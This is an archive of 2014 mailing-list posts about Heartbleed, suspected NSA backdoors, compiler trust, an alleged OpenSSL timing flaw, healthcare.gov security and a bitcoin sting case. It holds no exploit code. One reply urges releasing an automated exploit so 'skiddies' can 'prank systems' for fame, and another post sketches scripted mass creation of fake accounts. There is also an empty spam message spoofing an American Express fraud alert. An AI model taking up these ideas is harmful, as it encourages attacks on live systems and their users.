vulnerabilities in OpenSSL? > > > > > Hey there, > > > > I was auditing OpenSSL last night. I looked at several files and found > > the following: > > > > https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893 > > /* Determine if we need to see RI. Strictly speaking if we want to > > * avoid an attack we should *always* see RI even on initial server > > * hello because the client doesn't see any renegotiation during an > > * attack. However this would mean we could not connect to any server > > * which doesn't support RI so for the immediate future tolerate RI > > * absence on initial connect only. > > */ > > > > Well that's awful coding. > > > > Unless I'm mistaken, the following memcmp is vulnerable to a remote > > timing attack. > > https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974 > > static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b) > > { > > if (a->ssl_version != b->ssl_version) > > return(1); > > if (a->session_id_length != b->session_id_length) > > return(1); > > return(memcmp(a->session_id,b->session_id,a->session_id_length)); > > } > > > > I posted both of these findings to the full disclosure list last night. > > I figured someone on this list might find it interesting as well. > > > > Cheers, > > Peter. > > > > > > Your best bet would be to make an automated exploit for proof-of-concept. If it allows skiddies to prank systems, people will rush to correct it and your name will be in the headlines for your 15 minutes of fame. From rysiek at hackerspace.pl Thu Apr 10 11:29:55 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 10 Apr 2014 20:29:55 +0200 Subject: OpenWTF Message-ID: <6440800.JWA5UCEB7T@lap> OHAI, So I suppose many of you have already seen this. Nonetheless... W: http://article.gmane.org/gmane.os.openbsd.misc/211963 T: http://www.tedunangst.com/flak/post/heartbleed-vs-mallocconf F: http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse To get you interested: > No. OpenSSL has exploit mitigation countermeasures to make sure it's > exploitable. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From jamesdbell9 at yahoo.com Thu Apr 10 21:05:12 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Thu, 10 Apr 2014 21:05:12 -0700 (PDT) Subject: healthcare.gov vulnerability? In-Reply-To: <20140411033654.1F352228100@palinka.tinho.net> References: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> <20140411033654.1F352228100@palinka.tinho.net> Message-ID: <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com> >From: "dan at geer.org" >To: jim bell Jim, >And I wonder how all the tax preparation sites plus irs.gov are >waltzing with Heartbleed just now.  April 15 is Tuesday... >--dan Yes, it's amazing how much security on the Internet is constructed on foundations of sand, 23 years (for example) after the writing of PGP.  Organizations such as the NSA and CIA should be required to show that they are pulling their own weight, by discovering and fixing these kinds of bugs.  After all, ostensibly they exist for the benefit of the citizenry of America, right?  I would question the raison d'etre of the NSA if it found itself more interested in maintaining the existence of security bugs, than of closing them.  The NSA can't claim that nobody else could find them or exploit them. As for my idea about healthcare.gov vulnerability:  I thought of this many months ago, but I decided not to post it until the deadline had virtually expired.  (Although, it wasn't like I thought I was the only one who could imagine such a thing!).   I was amazed by the lack of discussion in the lamestream media about the potential vulnerabilities of people's personal data.  But, even more obvious to me was the fact that healthcare.gov virtually invited people to enter false data: It refused to provide people information about health care plans until they had entered their own personal information.  A person would be motivated to enter a mostly-fake set of data, solely for the purpose of getting access to the plans. And, there was a potential 'innocent reason':  Systems like this might get 'stuck', making it difficult to correct data, and people might be tempted to initiate a new account, solely for the purpose of abandoning old data.    I realized that depending on how well healthcare.gov had been written, a cracker with a script could upload thousands or even over a million accounts, presumably for the purpose of making the account-numbers look good.             Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3009 bytes Desc: not available URL: From rysiek at hackerspace.pl Thu Apr 10 13:08:16 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 10 Apr 2014 22:08:16 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: Message-ID: <2853647.cGAsq4hNKP@lap> Dnia czwartek, 10 kwietnia 2014 16:26:46 Juan Garofalo pisze: > --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp > > wrote: > > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters > > > > > > >> It makes me wonder if the NSA was involved in inserting this bug into > >> OpenSSL clients and servers. > > > > That would be 2+ years of amazing win on NSA part [1]. Any unlikely > > impropriety would come out soon. More likely reality... opensource > > people are busy and good humans and coding mistakes happen. > > Oh. And what about the constant babbling stating that open source is > oh-so-great security-wise because lots of people can look at the code bla > bla bla bla bla. Bla! Well, they can. Doesn't mean they do. Time to get the message out there: "start bloody looking at the code". -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From dan at geer.org Thu Apr 10 19:40:45 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 10 Apr 2014 22:40:45 -0400 Subject: a speech Message-ID: <20140411024045.274C02280F0@palinka.tinho.net> Perhaps of relevance here. APT in a World of Rising Interdependence invited address, NSA, 26 March 2014 http://geer.tinho.net/geer.nsa.26iii14.txt --dan From tpb-crypto at laposte.net Thu Apr 10 13:51:46 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Thu, 10 Apr 2014 22:51:46 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <2853647.cGAsq4hNKP@lap> References: <2853647.cGAsq4hNKP@lap> Message-ID: <640286212.131972.1397163106211.JavaMail.www@wwinf8308> > Message du 10/04/14 22:42 > De : "rysiek" > A : cypherpunks at cpunks.org > Copie à : > Objet : Re: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL > > Dnia czwartek, 10 kwietnia 2014 16:26:46 Juan Garofalo pisze: > > --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp > > > > wrote: > > > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters > > > > > > > > > >> It makes me wonder if the NSA was involved in inserting this bug into > > >> OpenSSL clients and servers. > > > > > > That would be 2+ years of amazing win on NSA part [1]. Any unlikely > > > impropriety would come out soon. More likely reality... opensource > > > people are busy and good humans and coding mistakes happen. > > > > Oh. And what about the constant babbling stating that open source is > > oh-so-great security-wise because lots of people can look at the code bla > > bla bla bla bla. Bla! > > Well, they can. Doesn't mean they do. Time to get the message out there: > "start bloody looking at the code". > > -- > Pozdr > rysiek> > [ signature.asc (0.3 Ko) ] There is one reason why this bug came to light, we can see the source code. Otherwise it could be exploited for decades instead of two years and nobody would ever notice it. From dan at geer.org Thu Apr 10 20:15:12 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 10 Apr 2014 23:15:12 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." Message-ID: <20140411031512.1B3E12280F8@palinka.tinho.net> > It makes me wonder if the NSA was involved in inserting this bug into > OpenSSL clients and servers. If they did it, someone got a promotion. If they are as surprised as you are, someone got fired. In the meantime, tell me that gcc is so compact and well vetted that there is no room in it for insertions... --dan, channeling for Ken Thompson From dan at geer.org Thu Apr 10 20:36:54 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 10 Apr 2014 23:36:54 -0400 Subject: healthcare.gov vulnerability? In-Reply-To: Your message of "Wed, 09 Apr 2014 10:29:19 PDT." <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> Message-ID: <20140411033654.1F352228100@palinka.tinho.net> Jim, And I wonder how all the tax preparation sites plus irs.gov are waltzing with Heartbleed just now. April 15 is Tuesday... --dan From dan at geer.org Thu Apr 10 21:06:50 2014 From: dan at geer.org (dan at geer.org) Date: Fri, 11 Apr 2014 00:06:50 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: Your message of "Thu, 10 Apr 2014 17:59:49 EDT." <53471455.9010801@loom.cc> Message-ID: <20140411040650.884292280F8@palinka.tinho.net> | | And time to start building from source, examining source diffs, and | devising one's own stress tests. | http://ieeexplore.ieee.org/xpl/login.jsp?tp=&arnumber=1565233 Countering trusting trust through diverse double-compiling An air force evaluation of Multics, and Ken Thompson's famous Turing award lecture "reflections on trusting trust, " showed that compilers can be subverted to insert malicious Trojan horses into critical software, including themselves. If this attack goes undetected, even complete analysis of a system's source code can not find the malicious code that is running, and methods for detecting this particular attack are not widely known. This paper describes a practical technique, termed diverse double-compiling (DDC), that detects this attack and some compiler defects as well. Simply recompile the source code twice: once with a second (trusted) compiler, and again using the result of the first compilation. If the result is bit-for-bit identical with the untrusted binary, then the source code accurately represents the binary. This technique has been mentioned informally, but its issues and ramifications have not been identified or discussed in a peer-reviewed work, nor has a public demonstration been made. This paper describes the technique, justifies it, describes how to overcome practical challenges, and demonstrates it. From jamesdbell9 at yahoo.com Fri Apr 11 00:37:04 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Fri, 11 Apr 2014 00:37:04 -0700 (PDT) Subject: Police inventing fake crimes Message-ID: <1397201824.58487.YahooMailNeo@web126201.mail.ne1.yahoo.com> The major flaw that I see with this case (and others like it) is that it presumes that the defendants actually BELIEVED the statements by the police, and RELIED ON them.  From the article: "Still, undercover officers with the U.S. Secret Service and Miami Beach police told both clearly that they wanted to buy bitcoins with cash supposedly generated by the hacking of Target Corp. customer information. The undercover officers said during the secretly videotaped meetings that they planned to use the bitcoins to acquire still more stolen credit cards." I could 'clearly tell' somebody that the Sun orbited the Earth, but that doesn't mean that the statement was factual.  Similarly, the fact that the police told these guys what the article claims they did, doesn't require that the defendants actually BELIEVED the allegations.  My expectation is that these charges will be quietly dropped:  The only ones actually committing the crime(s) are the police themselves:  The police solicited money laundering, when there were no facts (actual underlying crimes) supporting the money laundering predicate.        Jim Bell ======================================= http://news.yahoo.com/fla-bitcoin-case-tests-money-laundering-limits-152957544.html MIAMI BEACH, Fla. (AP) — Two police officers burst through a hotel room door with guns drawn, yelling "Police! Get Down!" just after an alleged money laundering transaction went down. But instead of briefcases stuffed with a drug dealer's cash, this exchange involved an undercover officer with supposedly stolen credit cards and the virtual currency bitcoin. The February arrests of Pascal Reid and Michell Espinoza marked the first time any state has brought money laundering charges involving bitcoins, according to Miami-Dade State Attorney Katherine Fernandez Rundle. And it's likely to be a closely-watched test of whether criminal law can adapt to new digital forms of payment. "These cybercriminals are way ahead of the rest of us in terms of trying to figure out ways they can launder dirty money," Rundle said. Investigators trolled through an online directory of bitcoin traders to find the 29-year-old Reid and 30-year-old Espinoza, setting up separate meetings with each of the men at restaurants and coffee shops. They were arrested at the same Miami Beach hotel on the same day, at different times. Defense attorneys said the men have no previous criminal records and were simply enthusiasts of the payment format that allows people to convert cash into digital money for online transactions. Still, undercover officers with the U.S. Secret Service and Miami Beach police told both clearly that they wanted to buy bitcoins with cash supposedly generated by the hacking of Target Corp. customer information. The undercover officers said during the secretly videotaped meetings that they planned to use the bitcoins to acquire still more stolen credit cards. "My client has never dealt in the area of stolen credit cards," said Espinoza's attorney, Rene Palomino Jr. "My client was simply selling a piece of personal property, which is what a bitcoin is. It has not been recognized as currency yet in the United States."Attorneys for Reid and Espinoza, both of whom have pleaded not guilty, say they will challenge the very legal foundations of the cases, which are being prosecuted separately. The arrest affidavits for both Reid and Espinoza refer to bitcoins as "electronic currency with no central authority." The Internal Revenue Service issued guidance last month concluding that bitcoins can only be taxed as property and are not legal tender. Federal law enforcement agencies are watching whether bitcoins are used increasingly in criminal activity, such as the now-defunct Silk Road illegal drug marketplace. "The idea that illicit actors might exploit the vulnerabilities of virtual currency to launder money is not merely theoretical," said Jennifer Shasky Calvery, director of Treasury's Financial Crimes Enforcement Network, in a recent Florida speech to bankers. Still, bitcoins have been gaining popularity among mainstream businesses. Overstock.com recently became the first major retailer to accept digital money and the NBA's Sacramento Kings in January announced the team would accept bitcoins, another first. They are increasingly used in restaurants, coffee shops and elsewhere. The Latin House Grill in Coral Gables is one of the first South Florida restaurants to accept bitcoins and has been hosting meetings to educate people.Bitcoin users exchange cash for digital money using online exchanges, then store it in a computer program that serves as a wallet. The program can transfer payments directly to merchants or individuals around the world, eliminating transaction fees and the need for bank or credit card information. "This technology can't go away. It's completely disrupted a lot of existing technology that's archaic, that hasn't evolved," said patron Andrew Barnard, who has been using bitcoins for a year. In the Florida criminal case, Reid and Espinoza each face up to 25 years in prison if convicted of money laundering and engaging in an unlicensed money services business. Reid is free on $100,000 bail but Espinoza has been unable so far to make bail. The transactions started small — one payment of $500 translated into about half a bitcoin — and eventually built to a proposed swap involving $30,000 in Reid's case. "Ice cold money. Ice cold cash. Right out of the freezer," the undercover agent, holding a plastic bag of cash tells Reid on the surveillance tape. Just after Reid accepts the bag, the undercover agent says, "We're cooking with gas," an apparent signal to the officers outside to come in. "You're a cop?" Reid is heard saying on the tape. "You're a cop?" Reid attorney Ron Lowy said the prosecution was manufactured. "The government is frightened of bitcoin. Apparently, they see it as an emerging, new type of economic medium of exchange, and they're worried that they're not regulating it close enough," Lowy said. "These facts do not constitute a crime." ___ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12550 bytes Desc: not available URL: From rysiek at hackerspace.pl Thu Apr 10 16:10:53 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 11 Apr 2014 01:10:53 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53471455.9010801@loom.cc> References: <2853647.cGAsq4hNKP@lap> <53471455.9010801@loom.cc> Message-ID: <2304065.KDyk0d8uBL@lap> Dnia czwartek, 10 kwietnia 2014 17:59:49 Patrick Chkoreff pisze: > rysiek wrote, On 04/10/2014 04:08 PM: > > Dnia czwartek, 10 kwietnia 2014 16:26:46 Juan Garofalo pisze: > >> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp > >> > >> > >> Oh. And what about the constant babbling stating that open source > >> is oh-so-great security-wise because lots of people can look at > >> the code bla bla bla bla bla. Bla! > > > > Well, they can. Doesn't mean they do. Time to get the message out > > there: "start bloody looking at the code". > > And time to start building from source, examining source diffs, and > devising one's own stress tests. Also, this: http://www.youtube.com/watch?v=fwcl17Q0bpk -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From fraud at americanexpress.com Fri Apr 11 07:54:41 2014 From: fraud at americanexpress.com (American Express) Date: Fri, 11 Apr 2014 06:54:41 -0800 Subject: Irregular check card activity Message-ID: {_BODY_TEXT} -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12644 bytes Desc: not available URL: From drwho at virtadpt.net Fri Apr 11 09:56:38 2014 From: drwho at virtadpt.net (The Doctor) Date: Fri, 11 Apr 2014 09:56:38 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <20140411031512.1B3E12280F8@palinka.tinho.net> References: <20140411031512.1B3E12280F8@palinka.tinho.net> Message-ID: <53481EC6.8060403@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/10/2014 08:15 PM, dan at geer.org wrote: > In the meantime, tell me that gcc is so compact and well vetted > that there is no room in it for insertions... Some interesting research has been done recently on this very topic that might be of interest to this particular mailing list. Oh, and cheers! - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ It's easier to get forgiveness for being wrong than forgiveness for being right. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNIHsYACgkQO9j/K4B7F8G0fACggcCn+ngLNoKWl4oOTYcAz46v VSYAni0ULpv7m2GBVwjbjGQl86x42YQP =gOJ/ -----END PGP SIGNATURE----- From drwho at virtadpt.net Fri Apr 11 10:00:03 2014 From: drwho at virtadpt.net (The Doctor) Date: Fri, 11 Apr 2014 10:00:03 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <20140411040650.884292280F8@palinka.tinho.net> References: <20140411040650.884292280F8@palinka.tinho.net> Message-ID: <53481F93.7040800@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/10/2014 09:06 PM, dan at geer.org wrote: > http://ieeexplore.ieee.org/xpl/login.jsp?tp=&arnumber=1565233 > Countering trusting trust through diverse double-compiling Yep, that's it. His proof-of-concept implementation is well worth examining. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ It's easier to get forgiveness for being wrong than forgiveness for being right. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNIH5MACgkQO9j/K4B7F8HtLACg1ZIlOcCeW9Kl2fV+kDxQxNT0 SxwAnjFKiOaU995Jr4vtgoC9js+2WNhw =NinQ -----END PGP SIGNATURE----- From drwho at virtadpt.net Fri Apr 11 10:04:38 2014 From: drwho at virtadpt.net (The Doctor) Date: Fri, 11 Apr 2014 10:04:38 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: <534820A6.7030408@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/11/2014 06:07 AM, tpb-crypto at laposte.net wrote: > It could have been inserted into the OpenSSL repository through a > backdoor... or why would the spies by so interested in hacking > professors that deal with > crypto and whose word is trusted by the masses? Like they did to a Belgian For just that reason, perhaps? Because they're experts, the work and word of whom are trusted? That would be the first place I'd expect most people to look last. > It may be possible that Segelmann did his job correctly, that the > reviewer did his job correctly, but someone unknown may have > changed it just a little bit > before delivery. What ya fellow coders think? The timing of the commit in question is most interesting, indeed: http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c5082161b02a22116ad75f822b1 ...the date and time of the year when people are least likely to be sitting at their computers watching for and reviewing commits. Only better time would probably have been at 2359 hours UTC. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ WWPMD? (What Would Paul Muad'dib Do?) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNIIKYACgkQO9j/K4B7F8F3jwCgke6jqiBTm7DQrQrq7OyeEnD2 zEgAn155/V3TLOKjhlSI8X/gg65+gP84 =mCzP -----END PGP SIGNATURE----- From odinn.cyberguerrilla at riseup.net Fri Apr 11 11:28:07 2014 From: odinn.cyberguerrilla at riseup.net (Odinn Cyberguerrilla) Date: Fri, 11 Apr 2014 11:28:07 -0700 Subject: healthcare.gov vulnerability? In-Reply-To: <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> <20140411033654.1F352228100@palinka.tinho.net> <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <96d92c945650d0626dd302288856fb05.squirrel@fruiteater.riseup.net> Healthcare.gov used to have some very bad vulnerabilities. Some of which still are laying around in wait, but --> https://www.ssllabs.com/ssltest/index.html they've fixed it up since a while back. However, that doesn't necessarily mean anything. One of the biggest providers, Anthem (anthem.com) fails. (servers: openroadfromanthem (cert not even valid), deploy.static.akamaitechnologies.com... 'F' grades, ssltest) Supposedly people are getting connected to these health insurance companies through healthcare.gov ~ real reassuring, right? >>From: "dan at geer.org" >>To: jim bell >>Jim, >>And I wonder how all the tax preparation sites plus irs.gov are >>waltzing with Heartbleed just now.  April 15 is Tuesday... >>--dan > > Yes, it's amazing how much security on the Internet is constructed on > foundations of sand, 23 years (for example) after the writing of PGP. >  Organizations such as the NSA and CIA should be required to show that > they are pulling their own weight, by discovering and fixing these kinds > of bugs.  After all, ostensibly they exist for the benefit of the > citizenry of America, right?  I would question the raison d'etre of the > NSA if it found itself more interested in maintaining the existence of > security bugs, than of closing them.  The NSA can't claim that nobody else > could find them or exploit them. > > As for my idea about healthcare.gov vulnerability:  I thought of this many > months ago, but I decided not to post it until the deadline had virtually > expired.  (Although, it wasn't like I thought I was the only one who could > imagine such a thing!).   I was amazed by the lack of discussion in the > lamestream media about the potential vulnerabilities of people's personal > data.  But, even more obvious to me was the fact that healthcare.gov > virtually invited people to enter false data: It refused to provide people > information about health care plans until they had entered their own > personal information.  A person would be motivated to enter a mostly-fake > set of data, solely for the purpose of getting access to the plans. > And, there was a potential 'innocent reason':  Systems like this might get > 'stuck', making it difficult to correct data, and people might be tempted > to initiate a new account, solely for the purpose of abandoning old data. >    I realized that depending on how well healthcare.gov had been written, > a cracker with a script could upload thousands or even over a million > accounts, presumably for the purpose of making the account-numbers look > good. >             Jim Bell From drwho at virtadpt.net Fri Apr 11 12:49:46 2014 From: drwho at virtadpt.net (The Doctor) Date: Fri, 11 Apr 2014 12:49:46 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53482E2B.4050201@cpunk.us> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> Message-ID: <5348475A.9010508@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/11/2014 11:02 AM, Cypher wrote: > I agree that there is no proof that this bug was introduced on > purpose and it might be a simple oversight (no matter what it looks > like or could be). We have to keep in mind that one of the things > spies do is I think it's safe to say that all of us have made mistakes that later came back to bite us. Not all of them were as critical as Heartbleed, but neither are any of us perfect. Additionally, a few folks are calling it the Tequila Hypothesis. Looking at it that way, the heartbeat feature really might have seemed like a good idea at the time (regardless of whether or not alcohol was actually involved). > NSA/GCHQ. Part of the power these agencies wield is that /we'll > likely never know/ and so we suspect...everyone. Everything. They do. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Look up! Look down! Now look at Mr. Frying Pan!" --George Newman, _UHF_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNIR1oACgkQO9j/K4B7F8FppwCgokjuzqzUOvp0JVkjn6z8qTUF REAAoKT8Q5uglU9nV9g9NyKaW031HIYv =t3qU -----END PGP SIGNATURE----- From cypher at cpunk.us Fri Apr 11 11:02:19 2014 From: cypher at cpunk.us (Cypher) Date: Fri, 11 Apr 2014 13:02:19 -0500 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <3135353.1KRi2F89Iu@lap> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> Message-ID: <53482E2B.4050201@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 04/11/2014 12:54 PM, rysiek wrote: > Dnia piątek, 11 kwietnia 2014 10:04:38 The Doctor pisze: >> The timing of the commit in question is most interesting, >> indeed: >> >> http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c508216 >> >> 1b02a22116ad75f822b1 >> >> ...the date and time of the year when people are least likely to >> be sitting at their computers watching for and reviewing commits. >> Only better time would probably have been at 2359 hours UTC. > > Now I love my conspiracy theories just like the next guy and I > definitely do not take sides (I am myself quite inclined to think > this is not entirely an honest mistake), but... > > ...the kind of argument you make rings a bell: > http://en.wikipedia.org/wiki/Anthropic_bias > > I agree that this was the very best time for a commit so that > nobody sees it/reviews it. Maybe this is why nobody has seen it nor > reviewed it? As in, the very fact it is so does not prove that it > was done at this time on purpose. I agree that there is no proof that this bug was introduced on purpose and it might be a simple oversight (no matter what it looks like or could be). We have to keep in mind that one of the things spies do is sow suspicion and doubt - it's a powerful weapon! All these vulnerabilities we're finding in critical software /might just be/ mistakes and oversights. Or they might be deliberate attacks by the NSA/GCHQ. Part of the power these agencies wield is that /we'll likely never know/ and so we suspect...everyone. Everything. Cypher - -- Want to communicate with me privately? Find my PGP public key here: http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTSC4qAAoJEFuutbL6JoJrbIYQAJCMlCI7rpWZq/yUuVFZOmpW dO1QxMF1Gz0KA+MFBc5eiKzWsYbggY6jGfufiaWPDgV7fpmdirkz2enbEro6VFqN kOQded5v72g+cHDJjb4xcsK3J/k+RKeOxQxrNd8XeiqxGAqLlScDos+LGeOOee1f Dgefk/uQ1g/8O3sYz+uQhTyRWy+oEfSr1WUCvPYO1MiQcGt2BSC3S5RxMNKyj1XG so+pIKtrMJq842Rxl8OBJEAHpK7o4AnN9ealHpa6o+4nUR8C4WrN+T+rwnvpuZOI ujfWO6bEMfmGtNxOiZY3FfiJTLILrD4Ebiy28sJp6FkT53Kvvh7Bk4jdB5HJFSBh T4RzsOE5dEcGKIUrkA1W0Ct+SxZY167rFpKKzG4D95onN4EDHkZANm+bq24NxMf7 oB2rm6F1WCb5T2IRFzUiMln0brNGmp1jM9Y4jHRvc7Nsk+X9Xrq0lGoMKiWXqa2j XWQvgdQe3xPods/HRrEThHOJf9zg3YoxdeLmCJvUm459nHjiswOFSEobuYhbroFz Gx9fNyQxy2V2rCY8Yl7vE8qXp6L0S8pylZdeveyXrcKUc4jL3FOKYkEm5Exm9Rmg teI+NvbmUsO8AdEV3v70gvT6pjZr62gxWOjkbRX4LIHIq3eTZJ9+XyrVRGiLx+YU RNu3H/lUDe49yCmtd6O1 =8cIX -----END PGP SIGNATURE----- From gfoster at entersection.org Fri Apr 11 12:33:41 2014 From: gfoster at entersection.org (Gregory Foster) Date: Fri, 11 Apr 2014 14:33:41 -0500 Subject: NSA alleged to have known & used Heartbleed for 2 years Message-ID: <53484395.9090208@entersection.org> Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing Consumers": http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html > The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. gf -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ From cathalgarvey at cathalgarvey.me Fri Apr 11 06:37:11 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey (Phone)) Date: Fri, 11 Apr 2014 14:37:11 +0100 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: It'd be hard to hide an insertion if the devs all dig into the hashes of commits of their own local repos and compare, right? Even a broken hash would require changing input, so they could go an extra step and verify each commit using another hash algo, if they were feeling super-paranoid. I'm still on the fence: this is the kind of error C is infamous for after all. On 11 April 2014 14:07:09 GMT+01:00, tpb-crypto at laposte.net wrote: >> Message du 11/04/14 05:44 >> De : dan at geer.org >> > It makes me wonder if the NSA was involved in inserting this bug >into >> > OpenSSL clients and servers. >> >> If they did it, someone got a promotion. If they are as surprised >> as you are, someone got fired. >> >> In the meantime, tell me that gcc is so compact and well vetted that >> there is no room in it for insertions... >> > >This article makes an interesting point, we got to dig a bit more from >our pockets: > >http://www.wired.com/2014/04/heartbleedslesson/ > >The second point I wish to make is the surprise by which the original >developer took the issue. Maybe, just maybe, he did not create that >flaw at all. > >It could have been inserted into the OpenSSL repository through a >backdoor ... or why would the spies by so interested in hacking >professors that deal with crypto and whose word is trusted by the >masses? Like they did to a Belgian cryptographer? Was that fellow nerd >a turrist of sorts? > >It may be possible that Segelmann did his job correctly, that the >reviewer did his job correctly, but someone unknown may have changed it >just a little bit before delivery. > > >Besides funding projects like OpenSSL better, we should start >considering the security of the repositories themselves. > >What ya fellow coders think? -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2496 bytes Desc: not available URL: From tpb-crypto at laposte.net Fri Apr 11 06:07:09 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 11 Apr 2014 15:07:09 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <20140411031512.1B3E12280F8@palinka.tinho.net> References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> Message-ID: 